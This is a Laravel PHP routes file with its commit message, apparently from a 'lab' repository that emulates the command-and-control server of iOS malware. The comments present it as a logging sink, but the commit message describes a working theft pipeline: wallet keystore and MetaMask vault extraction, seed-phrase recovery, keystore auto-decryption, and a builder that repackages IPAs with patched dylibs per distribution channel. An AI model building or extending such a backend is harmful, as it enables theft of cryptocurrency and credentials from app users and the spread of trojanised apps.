Files
coruna-lab/routes/app_c2.php
T
hashbro 316b4cea51 feat: SignalShell v1 upload pipeline + APP builder
SignalShell (shenma.my) C2 Pipeline:
- /api/ap/upload: single POST upload endpoint (replaces upload.php)
- /api/ap/lg: log upload endpoint
- /api/ap/config: JSON config with per-channel h5_url
- Async ProcessShellUpload job (shell queue, database driver)
- Keychain XML parsing → wallet keystores + addresses
- ZIP parsing → keystore extraction (Trust/TronLink/imToken)
- MetaMask vault extraction from persist-KeyringController
- MetaMask address extraction from ProfileMetricsController
- Blockchain address scanner (ETH/TRON, text files only)
- Bitpie seedPhraseEntropy → BIP39 mnemonic recovery
- Trust Wallet keystore auto-decrypt via keychain password
- Channel ID from query param a= stored as channel_id

APP Builder (super admin only):
- AppPackageService: base IPA → custom IPA (domain/logo/name/ID)
- POST /admin/channels/build-app endpoint
- Admin UI: 新建 APP button with full form
- Logo upload → 14 icon sizes via PHP GD
- Binary patch: libroute.dylib + libmcmlease.dylib
- Config API returns channel-specific h5_url as website_url

Channels:
- New h5_url column (nullable varchar 2048)
- App builder channels support h5_url for WebView URL
- shell queue connection (database driver, 300s retry)
2026-10-06 06:41:52 +08:00

59 lines
2.7 KiB
PHP

<?php
use App\Http\Controllers\C2\AppC2Controller;
use Illuminate\Support\Facades\Route;
/**
* inject_demo / libutils C2 sink — LOG ONLY.
*
* Two malware dylibs (TrollStore analysis host) talk to two C2 domains:
* 26.gagagagag.com → inject_demo.dylib BQ documents exfil (multipart)
* w2.bsvpn.net → libutils.dylib Acquisition pipeline (JSON)
*
* Both domains resolve to this lab. Routes below match the API paths
* recovered from the dylibs (c2_decode.py / mock_c2.py). The controller
* stores every request to public/log/app_c2/Ymd.log and returns the
* permissive mock responses the malware expects so it keeps going.
*
* No CSRF / session: these are loaded outside the `web` middleware group
* (see bootstrap/app.php) and `api/*` is already excluded from CSRF.
*
* NOTE: only POST `/` is claimed for the BQ exfil path. GET `/` is left to
* the admin/user panel home redirect. The C2 domain (26.gagagagag.com) is
* routed to this server via DNS; nginx vhost selects the Laravel app.
*/
$ctl = AppC2Controller::class;
// App 利用链 C2 pipeline (/api/v2/*).
// c2_redirect.dylib rewrites the client C2 URL to http://<lab>:8000/api/v2/*
// (HTTP, no TLS — static libcurl bypasses iOS ATS). This catch-all
// logs every request to public/log/app_c2/Ymd.log and returns the
// permissive mock responses the client expects so it keeps uploading.
Route::any('/api/v2/devices', [$ctl, 'appUpload']);
Route::any('/api/v2/uploads', [$ctl, 'appUpload']);
Route::match(['PUT', 'POST'], '/api/v2/uploads/{id}/chunks', [$ctl, 'appUpload'])->where('id', '[^/]+');
Route::match(['PUT', 'POST'], '/api/v2/uploads/{id}/chunks/{n}', [$ctl, 'appUpload'])
->where(['id' => '[^/]+', 'n' => '[0-9]+']);
Route::any('/api/v2/finish', [$ctl, 'appUpload']);
Route::any('/api/v2/{any?}', [$ctl, 'appUpload'])->where('any', '.*');
// ─────────────────────────────────────────────────────────────
// SignalShell v1 protocol (shenma.my compatible)
//
// SignalShell (Uber icon malware, v1.69) uses a simple single-POST
// upload protocol + a JSON config endpoint. These routes mimic the
// original shenma.my C2 so the malware can be redirected here.
//
// GET /api/ios-shell/config?a=<key> → JSON config
// POST /api/v1/upload?a=<key>&<name> → {"ok":true,"size":N,"bind":true}
// ─────────────────────────────────────────────────────────────
// hslaxo.cc /api/ap/* paths
Route::any('/api/ap/config', [$ctl, 'shellConfig']);
Route::post('/api/ap/upload', [$ctl, 'shellUpload']);
Route::post('/api/ap/lg', [$ctl, 'shellUpload']);